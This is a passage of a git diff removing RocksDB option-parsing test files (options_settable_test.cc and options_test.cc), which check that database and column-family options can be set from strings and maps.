-// but it cannot be set through GetDBOptionsFromString(), or the test is not
-// updated accordingly.
-// After adding an option, we need to make sure it is settable by
-// GetDBOptionsFromString() and add the option to the input string passed to
-// DBOptionsFromString()in this test.
-// If it is a complicated type, you also need to add the field to
-// kDBOptionsBlacklist, and maybe add customized verification for it.
-TEST_F(OptionsSettableTest, DBOptionsAllFieldsSettable) {
-  const OffsetGap kDBOptionsBlacklist = {
-      {offsetof(struct DBOptions, env), sizeof(Env*)},
-      {offsetof(struct DBOptions, rate_limiter),
-       sizeof(std::shared_ptr<RateLimiter>)},
-      {offsetof(struct DBOptions, sst_file_manager),
-       sizeof(std::shared_ptr<SstFileManager>)},
-      {offsetof(struct DBOptions, info_log), sizeof(std::shared_ptr<Logger>)},
-      {offsetof(struct DBOptions, statistics),
-       sizeof(std::shared_ptr<Statistics>)},
-      {offsetof(struct DBOptions, db_paths), sizeof(std::vector<DbPath>)},
-      {offsetof(struct DBOptions, db_log_dir), sizeof(std::string)},
-      {offsetof(struct DBOptions, wal_dir), sizeof(std::string)},
-      {offsetof(struct DBOptions, write_buffer_manager),
-       sizeof(std::shared_ptr<WriteBufferManager>)},
-      {offsetof(struct DBOptions, listeners),
-       sizeof(std::vector<std::shared_ptr<EventListener>>)},
-      {offsetof(struct DBOptions, row_cache), sizeof(std::shared_ptr<Cache>)},
-      {offsetof(struct DBOptions, wal_filter), sizeof(const WalFilter*)},
-  };
-
-  char* options_ptr = new char[sizeof(DBOptions)];
-
-  // Count padding bytes by setting all bytes in the memory to a special char,
-  // copy a well constructed struct to this memory and see how many special
-  // bytes left.
-  DBOptions* options = new (options_ptr) DBOptions();
-  FillWithSpecialChar(options_ptr, sizeof(DBOptions), kDBOptionsBlacklist);
-  // It based on the behavior of compiler that padding bytes are not changed
-  // when copying the struct. It's prone to failure when compiler behavior
-  // changes. We verify there is unset bytes to detect the case.
-  *options = DBOptions();
-  int unset_bytes_base =
-      NumUnsetBytes(options_ptr, sizeof(DBOptions), kDBOptionsBlacklist);
-  ASSERT_GT(unset_bytes_base, 0);
-  options->~DBOptions();
-
-  options = new (options_ptr) DBOptions();
-  FillWithSpecialChar(options_ptr, sizeof(DBOptions), kDBOptionsBlacklist);
-
-  char* new_options_ptr = new char[sizeof(DBOptions)];
-  DBOptions* new_options = new (new_options_ptr) DBOptions();
-  FillWithSpecialChar(new_options_ptr, sizeof(DBOptions), kDBOptionsBlacklist);
-
-  // Need to update the option string if a new option is added.
-  ASSERT_OK(
-      GetDBOptionsFromString(*options,
-                             "wal_bytes_per_sync=4295048118;"
-                             "delete_obsolete_files_period_micros=4294967758;"
-                             "WAL_ttl_seconds=4295008036;"
-                             "WAL_size_limit_MB=4295036161;"
-                             "wal_dir=path/to/wal_dir;"
-                             "db_write_buffer_size=2587;"
-                             "max_subcompactions=64330;"
-                             "table_cache_numshardbits=28;"
-                             "max_open_files=72;"
-                             "max_file_opening_threads=35;"
-                             "max_background_jobs=8;"
-                             "base_background_compactions=3;"
-                             "max_background_compactions=33;"
-                             "use_fsync=true;"
-                             "use_adaptive_mutex=false;"
-                             "max_total_wal_size=4295005604;"
-                             "compaction_readahead_size=0;"
-                             "new_table_reader_for_compaction_inputs=false;"
-                             "keep_log_file_num=4890;"
-                             "skip_stats_update_on_db_open=false;"
-                             "max_manifest_file_size=4295009941;"
-                             "db_log_dir=path/to/db_log_dir;"
-                             "skip_log_error_on_recovery=true;"
-                             "writable_file_max_buffer_size=1048576;"
-                             "paranoid_checks=true;"
-                             "is_fd_close_on_exec=false;"
-                             "bytes_per_sync=4295013613;"
-                             "enable_thread_tracking=false;"
-                             "recycle_log_file_num=0;"
-                             "create_missing_column_families=true;"
-                             "log_file_time_to_roll=3097;"
-                             "max_background_flushes=35;"
-                             "create_if_missing=false;"
-                             "error_if_exists=true;"
-                             "delayed_write_rate=4294976214;"
-                             "manifest_preallocation_size=1222;"
-                             "allow_mmap_writes=false;"
-                             "stats_dump_period_sec=70127;"
-                             "allow_fallocate=true;"
-                             "allow_mmap_reads=false;"
-                             "use_direct_reads=false;"
-                             "use_direct_io_for_flush_and_compaction=false;"
-                             "max_log_file_size=4607;"
-                             "random_access_max_buffer_size=1048576;"
-                             "advise_random_on_open=true;"
-                             "fail_if_options_file_error=false;"
-                             "enable_pipelined_write=false;"
-                             "allow_concurrent_memtable_write=true;"
-                             "wal_recovery_mode=kPointInTimeRecovery;"
-                             "enable_write_thread_adaptive_yield=true;"
-                             "write_thread_slow_yield_usec=5;"
-                             "write_thread_max_yield_usec=1000;"
-                             "access_hint_on_compaction_start=NONE;"
-                             "info_log_level=DEBUG_LEVEL;"
-                             "dump_malloc_stats=false;"
-                             "allow_2pc=false;"
-                             "avoid_flush_during_recovery=false;"
-                             "avoid_flush_during_shutdown=false;"
-                             "allow_ingest_behind=false;"
-                             "concurrent_prepare=false;"
-                             "manual_wal_flush=false;",
-                             new_options));
-
-  ASSERT_EQ(unset_bytes_base, NumUnsetBytes(new_options_ptr, sizeof(DBOptions),
-                                            kDBOptionsBlacklist));
-
-  options->~DBOptions();
-  new_options->~DBOptions();
-
-  delete[] options_ptr;
-  delete[] new_options_ptr;
-}
-
-// If the test fails, likely a new option is added to ColumnFamilyOptions
-// but it cannot be set through GetColumnFamilyOptionsFromString(), or the
-// test is not updated accordingly.
-// After adding an option, we need to make sure it is settable by
-// GetColumnFamilyOptionsFromString() and add the option to the input
-// string passed to GetColumnFamilyOptionsFromString()in this test.
-// If it is a complicated type, you also need to add the field to
-// kColumnFamilyOptionsBlacklist, and maybe add customized verification
-// for it.
-TEST_F(OptionsSettableTest, ColumnFamilyOptionsAllFieldsSettable) {
-  // options in the blacklist need to appear in the same order as in
-  // ColumnFamilyOptions.
-  const OffsetGap kColumnFamilyOptionsBlacklist = {
-      {offset_of(&ColumnFamilyOptions::inplace_callback),
-       sizeof(UpdateStatus(*)(char*, uint32_t*, Slice, std::string*))},
-      {offset_of(
-           &ColumnFamilyOptions::memtable_insert_with_hint_prefix_extractor),
-       sizeof(std::shared_ptr<const SliceTransform>)},
-      {offset_of(&ColumnFamilyOptions::compression_per_level),
-       sizeof(std::vector<CompressionType>)},
-      {offset_of(
-           &ColumnFamilyOptions::max_bytes_for_level_multiplier_additional),
-       sizeof(std::vector<int>)},
-      {offset_of(&ColumnFamilyOptions::memtable_factory),
-       sizeof(std::shared_ptr<MemTableRepFactory>)},
-      {offset_of(&ColumnFamilyOptions::table_properties_collector_factories),
-       sizeof(ColumnFamilyOptions::TablePropertiesCollectorFactories)},
-      {offset_of(&ColumnFamilyOptions::comparator), sizeof(Comparator*)},
-      {offset_of(&ColumnFamilyOptions::merge_operator),
-       sizeof(std::shared_ptr<MergeOperator>)},
-      {offset_of(&ColumnFamilyOptions::compaction_filter),
-       sizeof(const CompactionFilter*)},
-      {offset_of(&ColumnFamilyOptions::compaction_filter_factory),
-       sizeof(std::shared_ptr<CompactionFilterFactory>)},
-      {offset_of(&ColumnFamilyOptions::prefix_extractor),
-       sizeof(std::shared_ptr<const SliceTransform>)},
-      {offset_of(&ColumnFamilyOptions::table_factory),
-       sizeof(std::shared_ptr<TableFactory>)},
-  };
-
-  char* options_ptr = new char[sizeof(ColumnFamilyOptions)];
-
-  // Count padding bytes by setting all bytes in the memory to a special char,
-  // copy a well constructed struct to this memory and see how many special
-  // bytes left.
-  ColumnFamilyOptions* options = new (options_ptr) ColumnFamilyOptions();
-  FillWithSpecialChar(options_ptr, sizeof(ColumnFamilyOptions),
-                      kColumnFamilyOptionsBlacklist);
-  // It based on the behavior of compiler that padding bytes are not changed
-  // when copying the struct. It's prone to failure when compiler behavior
-  // changes. We verify there is unset bytes to detect the case.
-  *options = ColumnFamilyOptions();
-
-  // Deprecatd option which is not initialized. Need to set it to avoid
-  // Valgrind error
-  options->max_mem_compaction_level = 0;
-
-  int unset_bytes_base = NumUnsetBytes(options_ptr, sizeof(ColumnFamilyOptions),
-                                       kColumnFamilyOptionsBlacklist);
-  ASSERT_GT(unset_bytes_base, 0);
-  options->~ColumnFamilyOptions();
-
-  options = new (options_ptr) ColumnFamilyOptions();
-  FillWithSpecialChar(options_ptr, sizeof(ColumnFamilyOptions),
-                      kColumnFamilyOptionsBlacklist);
-
-  // Following options are not settable through
-  // GetColumnFamilyOptionsFromString():
-  options->rate_limit_delay_max_milliseconds = 33;
-  options->compaction_options_universal = CompactionOptionsUniversal();
-  options->compression_opts = CompressionOptions();
-  options->hard_rate_limit = 0;
-  options->soft_rate_limit = 0;
-  options->compaction_options_fifo = CompactionOptionsFIFO();
-  options->max_mem_compaction_level = 0;
-
-  char* new_options_ptr = new char[sizeof(ColumnFamilyOptions)];
-  ColumnFamilyOptions* new_options =
-      new (new_options_ptr) ColumnFamilyOptions();
-  FillWithSpecialChar(new_options_ptr, sizeof(ColumnFamilyOptions),
-                      kColumnFamilyOptionsBlacklist);
-
-  // Need to update the option string if a new option is added.
-  ASSERT_OK(GetColumnFamilyOptionsFromString(
-      *options,
-      "compaction_filter_factory=mpudlojcujCompactionFilterFactory;"
-      "table_factory=PlainTable;"
-      "prefix_extractor=rocksdb.CappedPrefix.13;"
-      "comparator=leveldb.BytewiseComparator;"
-      "compression_per_level=kBZip2Compression:kBZip2Compression:"
-      "kBZip2Compression:kNoCompression:kZlibCompression:kBZip2Compression:"
-      "kSnappyCompression;"
-      "max_bytes_for_level_base=986;"
-      "bloom_locality=8016;"
-      "target_file_size_base=4294976376;"
-      "memtable_huge_page_size=2557;"
-      "max_successive_merges=5497;"
-      "max_sequential_skip_in_iterations=4294971408;"
-      "arena_block_size=1893;"
-      "target_file_size_multiplier=35;"
-      "min_write_buffer_number_to_merge=9;"
-      "max_write_buffer_number=84;"
-      "write_buffer_size=1653;"
-      "max_compaction_bytes=64;"
-      "max_bytes_for_level_multiplier=60;"
-      "memtable_factory=SkipListFactory;"
-      "compression=kNoCompression;"
-      "bottommost_compression=kDisableCompressionOption;"
-      "level0_stop_writes_trigger=33;"
-      "num_levels=99;"
-      "level0_slowdown_writes_trigger=22;"
-      "level0_file_num_compaction_trigger=14;"
-      "compaction_filter=urxcqstuwnCompactionFilter;"
-      "soft_rate_limit=530.615385;"
-      "soft_pending_compaction_bytes_limit=0;"
-      "max_write_buffer_number_to_maintain=84;"
-      "merge_operator=aabcxehazrMergeOperator;"
-      "memtable_prefix_bloom_size_ratio=0.4642;"
-      "memtable_insert_with_hint_prefix_extractor=rocksdb.CappedPrefix.13;"
-      "paranoid_file_checks=true;"
-      "force_consistency_checks=true;"
-      "inplace_update_num_locks=7429;"
-      "optimize_filters_for_hits=false;"
-      "level_compaction_dynamic_level_bytes=false;"
-      "inplace_update_support=false;"
-      "compaction_style=kCompactionStyleFIFO;"
-      "compaction_pri=kMinOverlappingRatio;"
-      "purge_redundant_kvs_while_flush=true;"
-      "hard_pending_compaction_bytes_limit=0;"
-      "disable_auto_compactions=false;"
-      "report_bg_io_stats=true;",
-      new_options));
-
-  ASSERT_EQ(unset_bytes_base,
-            NumUnsetBytes(new_options_ptr, sizeof(ColumnFamilyOptions),
-                          kColumnFamilyOptionsBlacklist));
-
-  options->~ColumnFamilyOptions();
-  new_options->~ColumnFamilyOptions();
-
-  delete[] options_ptr;
-  delete[] new_options_ptr;
-}
-#endif  // !__clang__
-#endif  // OS_LINUX || OS_WIN
-#endif  // !ROCKSDB_LITE
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-#ifdef GFLAGS
-  ParseCommandLineFlags(&argc, &argv, true);
-#endif  // GFLAGS
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/options/options_test.cc b/thirdparty/rocksdb/options/options_test.cc
deleted file mode 100644
index fc4939b..0000000
--- a/thirdparty/rocksdb/options/options_test.cc
+++ /dev/null
@@ -1,1655 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <cctype>
-#include <cstring>
-#include <unordered_map>
-#include <inttypes.h>
-
-#include "options/options_helper.h"
-#include "options/options_parser.h"
-#include "options/options_sanity_check.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/convenience.h"
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/utilities/leveldb_options.h"
-#include "util/random.h"
-#include "util/stderr_logger.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-#ifndef GFLAGS
-bool FLAGS_enable_print = false;
-#else
-#include <gflags/gflags.h>
-using GFLAGS::ParseCommandLineFlags;
-DEFINE_bool(enable_print, false, "Print options generated to console.");
-#endif  // GFLAGS
-
-namespace rocksdb {
-
-class OptionsTest : public testing::Test {};
-
-#ifndef ROCKSDB_LITE  // GetOptionsFromMap is not supported in ROCKSDB_LITE
-TEST_F(OptionsTest, GetOptionsFromMapTest) {
-  std::unordered_map<std::string, std::string> cf_options_map = {
-      {"write_buffer_size", "1"},
-      {"max_write_buffer_number", "2"},
-      {"min_write_buffer_number_to_merge", "3"},
-      {"max_write_buffer_number_to_maintain", "99"},
-      {"compression", "kSnappyCompression"},
-      {"compression_per_level",
-       "kNoCompression:"
-       "kSnappyCompression:"
-       "kZlibCompression:"
-       "kBZip2Compression:"
-       "kLZ4Compression:"
-       "kLZ4HCCompression:"
-       "kXpressCompression:"
-       "kZSTD:"
-       "kZSTDNotFinalCompression"},
-      {"bottommost_compression", "kLZ4Compression"},
-      {"compression_opts", "4:5:6:7"},
-      {"num_levels", "8"},
-      {"level0_file_num_compaction_trigger", "8"},
-      {"level0_slowdown_writes_trigger", "9"},
-      {"level0_stop_writes_trigger", "10"},
-      {"target_file_size_base", "12"},
-      {"target_file_size_multiplier", "13"},
-      {"max_bytes_for_level_base", "14"},
-      {"level_compaction_dynamic_level_bytes", "true"},
-      {"max_bytes_for_level_multiplier", "15.0"},
-      {"max_bytes_for_level_multiplier_additional", "16:17:18"},
-      {"max_compaction_bytes", "21"},
-      {"soft_rate_limit", "1.1"},
-      {"hard_rate_limit", "2.1"},
-      {"hard_pending_compaction_bytes_limit", "211"},
-      {"arena_block_size", "22"},
-      {"disable_auto_compactions", "true"},
-      {"compaction_style", "kCompactionStyleLevel"},
-      {"compaction_pri", "kOldestSmallestSeqFirst"},
-      {"verify_checksums_in_compaction", "false"},
-      {"compaction_options_fifo", "23"},
-      {"max_sequential_skip_in_iterations", "24"},
-      {"inplace_update_support", "true"},
-      {"report_bg_io_stats", "true"},
-      {"compaction_measure_io_stats", "false"},
-      {"inplace_update_num_locks", "25"},
-      {"memtable_prefix_bloom_size_ratio", "0.26"},
-      {"memtable_huge_page_size", "28"},
-      {"bloom_locality", "29"},
-      {"max_successive_merges", "30"},
-      {"min_partial_merge_operands", "31"},
-      {"prefix_extractor", "fixed:31"},
-      {"optimize_filters_for_hits", "true"},
-  };
-
-  std::unordered_map<std::string, std::string> db_options_map = {
-      {"create_if_missing", "false"},
-      {"create_missing_column_families", "true"},
-      {"error_if_exists", "false"},
-      {"paranoid_checks", "true"},
-      {"max_open_files", "32"},
-      {"max_total_wal_size", "33"},
-      {"use_fsync", "true"},
-      {"db_log_dir", "/db_log_dir"},
-      {"wal_dir", "/wal_dir"},
-      {"delete_obsolete_files_period_micros", "34"},
-      {"max_background_compactions", "35"},
-      {"max_background_flushes", "36"},
-      {"max_log_file_size", "37"},
-      {"log_file_time_to_roll", "38"},
-      {"keep_log_file_num", "39"},
-      {"recycle_log_file_num", "5"},
-      {"max_manifest_file_size", "40"},
-      {"table_cache_numshardbits", "41"},
-      {"WAL_ttl_seconds", "43"},
-      {"WAL_size_limit_MB", "44"},
-      {"manifest_preallocation_size", "45"},
-      {"allow_mmap_reads", "true"},
-      {"allow_mmap_writes", "false"},
-      {"use_direct_reads", "false"},
-      {"use_direct_io_for_flush_and_compaction", "false"},
-      {"is_fd_close_on_exec", "true"},
-      {"skip_log_error_on_recovery", "false"},
-      {"stats_dump_period_sec", "46"},
-      {"advise_random_on_open", "true"},
-      {"use_adaptive_mutex", "false"},
-      {"new_table_reader_for_compaction_inputs", "true"},
-      {"compaction_readahead_size", "100"},
-      {"random_access_max_buffer_size", "3145728"},
-      {"writable_file_max_buffer_size", "314159"},
-      {"bytes_per_sync", "47"},
-      {"wal_bytes_per_sync", "48"},
-  };
-
-  ColumnFamilyOptions base_cf_opt;
-  ColumnFamilyOptions new_cf_opt;
-  ASSERT_OK(GetColumnFamilyOptionsFromMap(
-            base_cf_opt, cf_options_map, &new_cf_opt));
-  ASSERT_EQ(new_cf_opt.write_buffer_size, 1U);
-  ASSERT_EQ(new_cf_opt.max_write_buffer_number, 2);
-  ASSERT_EQ(new_cf_opt.min_write_buffer_number_to_merge, 3);
-  ASSERT_EQ(new_cf_opt.max_write_buffer_number_to_maintain, 99);
-  ASSERT_EQ(new_cf_opt.compression, kSnappyCompression);
-  ASSERT_EQ(new_cf_opt.compression_per_level.size(), 9U);
-  ASSERT_EQ(new_cf_opt.compression_per_level[0], kNoCompression);
-  ASSERT_EQ(new_cf_opt.compression_per_level[1], kSnappyCompression);
-  ASSERT_EQ(new_cf_opt.compression_per_level[2], kZlibCompression);
-  ASSERT_EQ(new_cf_opt.compression_per_level[3], kBZip2Compression);
-  ASSERT_EQ(new_cf_opt.compression_per_level[4], kLZ4Compression);
-  ASSERT_EQ(new_cf_opt.compression_per_level[5], kLZ4HCCompression);
-  ASSERT_EQ(new_cf_opt.compression_per_level[6], kXpressCompression);
-  ASSERT_EQ(new_cf_opt.compression_per_level[7], kZSTD);
-  ASSERT_EQ(new_cf_opt.compression_per_level[8], kZSTDNotFinalCompression);
-  ASSERT_EQ(new_cf_opt.compression_opts.window_bits, 4);
-  ASSERT_EQ(new_cf_opt.compression_opts.level, 5);
-  ASSERT_EQ(new_cf_opt.compression_opts.strategy, 6);
-  ASSERT_EQ(new_cf_opt.compression_opts.max_dict_bytes, 7);
-  ASSERT_EQ(new_cf_opt.bottommost_compression, kLZ4Compression);
-  ASSERT_EQ(new_cf_opt.num_levels, 8);
-  ASSERT_EQ(new_cf_opt.level0_file_num_compaction_trigger, 8);
-  ASSERT_EQ(new_cf_opt.level0_slowdown_writes_trigger, 9);
-  ASSERT_EQ(new_cf_opt.level0_stop_writes_trigger, 10);
-  ASSERT_EQ(new_cf_opt.target_file_size_base, static_cast<uint64_t>(12));
-  ASSERT_EQ(new_cf_opt.target_file_size_multiplier, 13);
-  ASSERT_EQ(new_cf_opt.max_bytes_for_level_base, 14U);
-  ASSERT_EQ(new_cf_opt.level_compaction_dynamic_level_bytes, true);
-  ASSERT_EQ(new_cf_opt.max_bytes_for_level_multiplier, 15.0);
-  ASSERT_EQ(new_cf_opt.max_bytes_for_level_multiplier_additional.size(), 3U);
-  ASSERT_EQ(new_cf_opt.max_bytes_for_level_multiplier_additional[0], 16);
-  ASSERT_EQ(new_cf_opt.max_bytes_for_level_multiplier_additional[1], 17);
-  ASSERT_EQ(new_cf_opt.max_bytes_for_level_multiplier_additional[2], 18);
-  ASSERT_EQ(new_cf_opt.max_compaction_bytes, 21);
-  ASSERT_EQ(new_cf_opt.hard_pending_compaction_bytes_limit, 211);
-  ASSERT_EQ(new_cf_opt.arena_block_size, 22U);
-  ASSERT_EQ(new_cf_opt.disable_auto_compactions, true);
-  ASSERT_EQ(new_cf_opt.compaction_style, kCompactionStyleLevel);
-  ASSERT_EQ(new_cf_opt.compaction_pri, kOldestSmallestSeqFirst);
-  ASSERT_EQ(new_cf_opt.compaction_options_fifo.max_table_files_size,
-            static_cast<uint64_t>(23));
-  ASSERT_EQ(new_cf_opt.max_sequential_skip_in_iterations,
-            static_cast<uint64_t>(24));
-  ASSERT_EQ(new_cf_opt.inplace_update_support, true);
-  ASSERT_EQ(new_cf_opt.inplace_update_num_locks, 25U);
-  ASSERT_EQ(new_cf_opt.memtable_prefix_bloom_size_ratio, 0.26);
-  ASSERT_EQ(new_cf_opt.memtable_huge_page_size, 28U);
-  ASSERT_EQ(new_cf_opt.bloom_locality, 29U);
-  ASSERT_EQ(new_cf_opt.max_successive_merges, 30U);
-  ASSERT_TRUE(new_cf_opt.prefix_extractor != nullptr);
-  ASSERT_EQ(new_cf_opt.optimize_filters_for_hits, true);
-  ASSERT_EQ(std::string(new_cf_opt.prefix_extractor->Name()),
-            "rocksdb.FixedPrefix.31");
-
-  cf_options_map["write_buffer_size"] = "hello";
-  ASSERT_NOK(GetColumnFamilyOptionsFromMap(
-             base_cf_opt, cf_options_map, &new_cf_opt));
-  ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(base_cf_opt, new_cf_opt));
-
-  cf_options_map["write_buffer_size"] = "1";
-  ASSERT_OK(GetColumnFamilyOptionsFromMap(
-            base_cf_opt, cf_options_map, &new_cf_opt));
-
-  cf_options_map["unknown_option"] = "1";
-  ASSERT_NOK(GetColumnFamilyOptionsFromMap(
-             base_cf_opt, cf_options_map, &new_cf_opt));
-  ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(base_cf_opt, new_cf_opt));
-
-  ASSERT_OK(GetColumnFamilyOptionsFromMap(base_cf_opt, cf_options_map,
-                                          &new_cf_opt,
-                                          false, /* input_strings_escaped  */
-                                          true /* ignore_unknown_options */));
-  ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(
-      base_cf_opt, new_cf_opt, nullptr, /* new_opt_map */
-      kSanityLevelLooselyCompatible /* from CheckOptionsCompatibility*/));
-  ASSERT_NOK(RocksDBOptionsParser::VerifyCFOptions(
-      base_cf_opt, new_cf_opt, nullptr, /* new_opt_map */
-      kSanityLevelExactMatch /* default for VerifyCFOptions */));
-
-  DBOptions base_db_opt;
-  DBOptions new_db_opt;
-  ASSERT_OK(GetDBOptionsFromMap(base_db_opt, db_options_map, &new_db_opt));
-  ASSERT_EQ(new_db_opt.create_if_missing, false);
-  ASSERT_EQ(new_db_opt.create_missing_column_families, true);
-  ASSERT_EQ(new_db_opt.error_if_exists, false);
-  ASSERT_EQ(new_db_opt.paranoid_checks, true);
-  ASSERT_EQ(new_db_opt.max_open_files, 32);
-  ASSERT_EQ(new_db_opt.max_total_wal_size, static_cast<uint64_t>(33));
-  ASSERT_EQ(new_db_opt.use_fsync, true);
-  ASSERT_EQ(new_db_opt.db_log_dir, "/db_log_dir");
-  ASSERT_EQ(new_db_opt.wal_dir, "/wal_dir");
-  ASSERT_EQ(new_db_opt.delete_obsolete_files_period_micros,
-            static_cast<uint64_t>(34));
-  ASSERT_EQ(new_db_opt.max_background_compactions, 35);
-  ASSERT_EQ(new_db_opt.max_background_flushes, 36);
-  ASSERT_EQ(new_db_opt.max_log_file_size, 37U);
-  ASSERT_EQ(new_db_opt.log_file_time_to_roll, 38U);
-  ASSERT_EQ(new_db_opt.keep_log_file_num, 39U);
-  ASSERT_EQ(new_db_opt.recycle_log_file_num, 5U);
-  ASSERT_EQ(new_db_opt.max_manifest_file_size, static_cast<uint64_t>(40));
-  ASSERT_EQ(new_db_opt.table_cache_numshardbits, 41);
-  ASSERT_EQ(new_db_opt.WAL_ttl_seconds, static_cast<uint64_t>(43));
-  ASSERT_EQ(new_db_opt.WAL_size_limit_MB, static_cast<uint64_t>(44));
-  ASSERT_EQ(new_db_opt.manifest_preallocation_size, 45U);
-  ASSERT_EQ(new_db_opt.allow_mmap_reads, true);
-  ASSERT_EQ(new_db_opt.allow_mmap_writes, false);
-  ASSERT_EQ(new_db_opt.use_direct_reads, false);
-  ASSERT_EQ(new_db_opt.use_direct_io_for_flush_and_compaction, false);
-  ASSERT_EQ(new_db_opt.is_fd_close_on_exec, true);
-  ASSERT_EQ(new_db_opt.skip_log_error_on_recovery, false);
-  ASSERT_EQ(new_db_opt.stats_dump_period_sec, 46U);
-  ASSERT_EQ(new_db_opt.advise_random_on_open, true);
-  ASSERT_EQ(new_db_opt.use_adaptive_mutex, false);
-  ASSERT_EQ(new_db_opt.new_table_reader_for_compaction_inputs, true);
-  ASSERT_EQ(new_db_opt.compaction_readahead_size, 100);
-  ASSERT_EQ(new_db_opt.random_access_max_buffer_size, 3145728);
-  ASSERT_EQ(new_db_opt.writable_file_max_buffer_size, 314159);
-  ASSERT_EQ(new_db_opt.bytes_per_sync, static_cast<uint64_t>(47));
-  ASSERT_EQ(new_db_opt.wal_bytes_per_sync, static_cast<uint64_t>(48));
-
-  db_options_map["max_open_files"] = "hello";
-  ASSERT_NOK(GetDBOptionsFromMap(base_db_opt, db_options_map, &new_db_opt));
-  ASSERT_OK(RocksDBOptionsParser::VerifyDBOptions(base_db_opt, new_db_opt));
-  ASSERT_OK(RocksDBOptionsParser::VerifyDBOptions(
-      base_db_opt, new_db_opt, nullptr, /* new_opt_map */
-      kSanityLevelLooselyCompatible /* from CheckOptionsCompatibility */));
-
-  // unknow options should fail parsing without ignore_unknown_options = true
-  db_options_map["unknown_db_option"] = "1";
-  ASSERT_NOK(GetDBOptionsFromMap(base_db_opt, db_options_map, &new_db_opt));
-  ASSERT_OK(RocksDBOptionsParser::VerifyDBOptions(base_db_opt, new_db_opt));
-
-  ASSERT_OK(GetDBOptionsFromMap(base_db_opt, db_options_map, &new_db_opt,
-                                false, /* input_strings_escaped  */
-                                true /* ignore_unknown_options */));
-  ASSERT_OK(RocksDBOptionsParser::VerifyDBOptions(
-      base_db_opt, new_db_opt, nullptr, /* new_opt_map */
-      kSanityLevelLooselyCompatible /* from CheckOptionsCompatibility */));
-  ASSERT_NOK(RocksDBOptionsParser::VerifyDBOptions(
-      base_db_opt, new_db_opt, nullptr, /* new_opt_mat */
-      kSanityLevelExactMatch /* default for VerifyDBOptions */));
-}
-#endif  // !ROCKSDB_LITE
-
-#ifndef ROCKSDB_LITE  // GetColumnFamilyOptionsFromString is not supported in
-                      // ROCKSDB_LITE
-TEST_F(OptionsTest, GetColumnFamilyOptionsFromStringTest) {
-  ColumnFamilyOptions base_cf_opt;
-  ColumnFamilyOptions new_cf_opt;
-  base_cf_opt.table_factory.reset();
-  ASSERT_OK(GetColumnFamilyOptionsFromString(base_cf_opt, "", &new_cf_opt));
-  ASSERT_OK(GetColumnFamilyOptionsFromString(base_cf_opt,
-            "write_buffer_size=5", &new_cf_opt));
-  ASSERT_EQ(new_cf_opt.write_buffer_size, 5U);
-  ASSERT_TRUE(new_cf_opt.table_factory == nullptr);
-  ASSERT_OK(GetColumnFamilyOptionsFromString(base_cf_opt,
-            "write_buffer_size=6;", &new_cf_opt));
-  ASSERT_EQ(new_cf_opt.write_buffer_size, 6U);
-  ASSERT_OK(GetColumnFamilyOptionsFromString(base_cf_opt,
-            "  write_buffer_size =  7  ", &new_cf_opt));
-  ASSERT_EQ(new_cf_opt.write_buffer_size, 7U);
-  ASSERT_OK(GetColumnFamilyOptionsFromString(base_cf_opt,
-            "  write_buffer_size =  8 ; ", &new_cf_opt));
-  ASSERT_EQ(new_cf_opt.write_buffer_size, 8U);
-  ASSERT_OK(GetColumnFamilyOptionsFromString(base_cf_opt,
-            "write_buffer_size=9;max_write_buffer_number=10", &new_cf_opt));
-  ASSERT_EQ(new_cf_opt.write_buffer_size, 9U);
-  ASSERT_EQ(new_cf_opt.max_write_buffer_number, 10);
-  ASSERT_OK(GetColumnFamilyOptionsFromString(base_cf_opt,
-            "write_buffer_size=11; max_write_buffer_number  =  12 ;",
-            &new_cf_opt));
-  ASSERT_EQ(new_cf_opt.write_buffer_size, 11U);
-  ASSERT_EQ(new_cf_opt.max_write_buffer_number, 12);
-  // Wrong name "max_write_buffer_number_"
-  ASSERT_NOK(GetColumnFamilyOptionsFromString(base_cf_opt,
-             "write_buffer_size=13;max_write_buffer_number_=14;",
-              &new_cf_opt));
-  ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(base_cf_opt, new_cf_opt));
-
-  // Wrong key/value pair
-  ASSERT_NOK(GetColumnFamilyOptionsFromString(base_cf_opt,
-             "write_buffer_size=13;max_write_buffer_number;", &new_cf_opt));
-  ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(base_cf_opt, new_cf_opt));
-
-  // Error Paring value
-  ASSERT_NOK(GetColumnFamilyOptionsFromString(base_cf_opt,
-             "write_buffer_size=13;max_write_buffer_number=;", &new_cf_opt));
-  ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(base_cf_opt, new_cf_opt));
-
-  // Missing option name
-  ASSERT_NOK(GetColumnFamilyOptionsFromString(base_cf_opt,
-             "write_buffer_size=13; =100;", &new_cf_opt));
-  ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(base_cf_opt, new_cf_opt));
-
-  const int64_t kilo = 1024UL;
-  const int64_t mega = 1024 * kilo;
-  const int64_t giga = 1024 * mega;
-  const int64_t tera = 1024 * giga;
-
-  // Units (k)
-  ASSERT_OK(GetColumnFamilyOptionsFromString(
-      base_cf_opt, "max_write_buffer_number=15K", &new_cf_opt));
-  ASSERT_EQ(new_cf_opt.max_write_buffer_number, 15 * kilo);
-  // Units (m)
-  ASSERT_OK(GetColumnFamilyOptionsFromString(base_cf_opt,
-            "max_write_buffer_number=16m;inplace_update_num_locks=17M",
-            &new_cf_opt));
-  ASSERT_EQ(new_cf_opt.max_write_buffer_number, 16 * mega);
-  ASSERT_EQ(new_cf_opt.inplace_update_num_locks, 17 * mega);
-  // Units (g)
-  ASSERT_OK(GetColumnFamilyOptionsFromString(
-      base_cf_opt,
